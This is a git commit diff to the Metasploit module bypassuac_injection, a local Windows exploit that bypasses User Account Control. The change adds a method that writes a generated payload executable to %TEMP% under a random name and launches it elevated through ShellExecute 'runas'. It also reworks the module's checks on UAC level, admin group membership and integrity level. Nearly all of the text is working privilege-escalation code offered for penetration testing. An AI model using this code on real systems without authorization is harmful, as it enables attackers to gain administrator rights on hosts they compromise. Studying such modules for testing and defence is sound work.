Update bypassuac_injection inline with latest privs lib

bug/bundler_fix
Meatballs 2013-10-23 21:15:41 +01:00
parent e6a2a1006f
commit 6fdf5cab15
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 31 additions and 21 deletions

View File

@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Exploit::EXE include Exploit::EXE
include Post::Common
include Post::File include Post::File
include Post::Windows::Priv include Post::Windows::Priv
@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
end end
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
print_status("Payload executed")
end
def exploit def exploit
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
# #
# Verify use against Vista+ # Verify use against Vista+
@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
end end
if is_uac_enabled? if is_uac_enabled?
vprint_status "UAC is Enabled, checking level..." print_status "UAC is Enabled, checking level..."
else else
fail_with(Exploit::Failure::NotVulnerable, if is_in_admin_group?
"UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate" fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
) else
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
end end
case get_uac_level case get_uac_level
when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Exploit::Failure::NotVulnerable, fail_with(Exploit::Failure::NotVulnerable,
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..." "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
) )
when UACDefault when UAC_DEFAULT
print_good "UAC is set to Default" print_good "UAC is set to Default"
vprint_status "BypassUAC can bypass this setting, continuing..." print_good "BypassUAC can bypass this setting, continuing..."
when UACNoPrompt when UAC_NO_PROMPT
fail_with(Exploit::Failure::NotVulnerable, print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
"UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate" runas_method
) return
end end
# Check if you are an admin # Check if you are an admin
@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
if admin_group if admin_group
print_good('Part of Administrators group! Continuing...') print_good('Part of Administrators group! Continuing...')
else else
print_error('Not in admins group, cannot escalate with this module') fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
print_error('Exiting...')
return
end end
end end
if get_integrity_level == LowIntegrityLevel if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level") fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
end end